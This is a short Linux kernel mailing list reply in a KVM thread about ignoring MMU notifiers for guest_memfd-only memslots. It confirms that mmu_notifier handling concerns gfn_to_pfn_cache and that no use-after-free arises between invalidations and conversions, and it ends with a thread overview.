  Cc: Alexandru Elisei, sashiko-reviews, Marc Zyngier, kvm, kvmarm,
	Oliver Upton

On Tue, Jun 23, 2026, Ackerley Tng wrote:
> Sean Christopherson <seanjc@google.com> writes:
> > and purposes, we're conceptually treating conversions as free()+re-alloc()).  So
> > while the page might still be in the page cache, it's effectively been "freed".
> > So in that case, KVM really does need to ensure it handles mmu_notifier events
> > correctly to avoid UAF.
> 
> Just making sure: "handle mmu_notifier events" here refers to
> > gfn_to_pfn_cache and other parts of KVM that work with memory.

Yes. 

> There's no issue with a UAF between mmu_notifier invalidations and
> conversions, right?

Right.

Thread overview: 17+ messages
2026-06-15 15:52 [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots Alexandru Elisei
2026-06-15 16:09 ` sashiko-bot
2026-06-15 17:47   ` Sean Christopherson
2026-06-15 18:09     ` Sean Christopherson
2026-06-18 11:09       ` Alexandru Elisei
2026-06-17 13:07     ` Alexandru Elisei
2026-06-17 21:21       ` Sean Christopherson
2026-06-18 10:19         ` Alexandru Elisei
2026-06-23 23:41         ` Ackerley Tng
2026-06-24 17:32           ` Sean Christopherson
2026-06-17 21:22       ` Sean Christopherson
2026-06-18 11:26     ` David Hildenbrand (Arm)
2026-06-15 19:07 ` David Hildenbrand
2026-06-17 13:23   ` Alexandru Elisei
2026-06-17 13:41     ` David Hildenbrand
2026-06-17 13:50       ` Alexandru Elisei
2026-06-21  0:02 ` XIAO WU
